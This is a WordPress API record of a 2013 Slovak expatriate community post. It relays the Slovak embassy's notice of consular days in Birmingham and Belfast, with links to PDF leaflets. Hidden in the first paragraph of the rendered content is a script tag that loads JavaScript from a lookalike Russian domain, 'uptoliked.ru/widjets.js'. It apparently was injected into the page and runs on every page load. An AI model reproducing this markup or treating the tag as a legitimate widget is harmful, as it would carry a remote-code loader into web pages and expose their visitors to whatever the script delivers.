{"id":16022,"date":"2013-06-29T07:57:59","date_gmt":"2013-06-29T06:57:59","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=16022"},"modified":"2013-07-28T09:59:33","modified_gmt":"2013-07-28T08:59:33","slug":"konzularne-dni-v-mestach-birmingham-a-belfast","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=16022","title":{"rendered":"Konzul\u00e1rne dni v mest\u00e1ch Birmingham a Belfast"},"content":{"rendered":"<p style=\"text-align: justify;\"><b><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/07\/ZU-SR-London.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-16025\" alt=\"ZU SR London\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/07\/ZU-SR-London-150x139.jpg\" width=\"150\" height=\"139\" \/><\/a>Zastupite\u013esk\u00fd \u00farad SR v Lond\u00fdne n\u00e1s po\u017eiadal o zverejnenie oznamu o konzul\u00e1rnych d\u0148och, \u010do s rados\u0165ou rob\u00edme ako slu\u017ebu na\u0161im ob\u010danom a pod\u00e1vame \u010falej.<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/b><\/p>\n<p style=\"text-align: justify;\"><b>Konzul\u00e1rne oddelenie Z\u00da\u00a0 SR v Lond\u00fdne oznamuje, \u017ee pl\u00e1nuje v\u00fdjazd v d\u0148och 13.8.2013 do Birminghamu a 22.-23.8.2013 do Belfastu za \u00fa\u010delom poskytnutia konzul\u00e1rnych slu\u017eieb ob\u010danom SR. Informa\u010dn\u00e9 let\u00e1ky k obom akci\u00e1m n\u00e1jdete ni\u017e\u0161ie a tie\u017e na ofici\u00e1lnej str\u00e1nke Ve\u013evyslanectva SR v Lond\u00fdne.<\/b><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/07\/Konzularny_Den-Birmingham_August_2013_letak.pdf\">Konzularny_Den-Birmingham_August_2013_letak<\/a><\/p>\n<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/07\/Konzularne_Dni-Belfast_August_2013_letak.pdf\">Konzularne_Dni-Belfast_August_2013_letak<\/a><\/p>\n<p>Viac inform\u00e1cii n\u00e1jdete na: <a href=\"http:\/\/www.mzv.sk\/londyn\" target=\"_blank\">www.mzv.sk\/londyn<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zastupite\u013esk\u00fd \u00farad SR v Lond\u00fdne n\u00e1s po\u017eiadal o zverejnenie oznamu o konzul\u00e1rnych d\u0148och, \u010do s rados\u0165ou rob\u00edme ako slu\u017ebu na\u0161im ob\u010danom a pod\u00e1vame \u010falej. Konzul\u00e1rne oddelenie Z\u00da\u00a0 SR v Lond\u00fdne&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=16022\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-16022","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/16022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16022"}],"version-history":[{"count":3,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/16022\/revisions"}],"predecessor-version":[{"id":16027,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/16022\/revisions\/16027"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16022"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16022"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}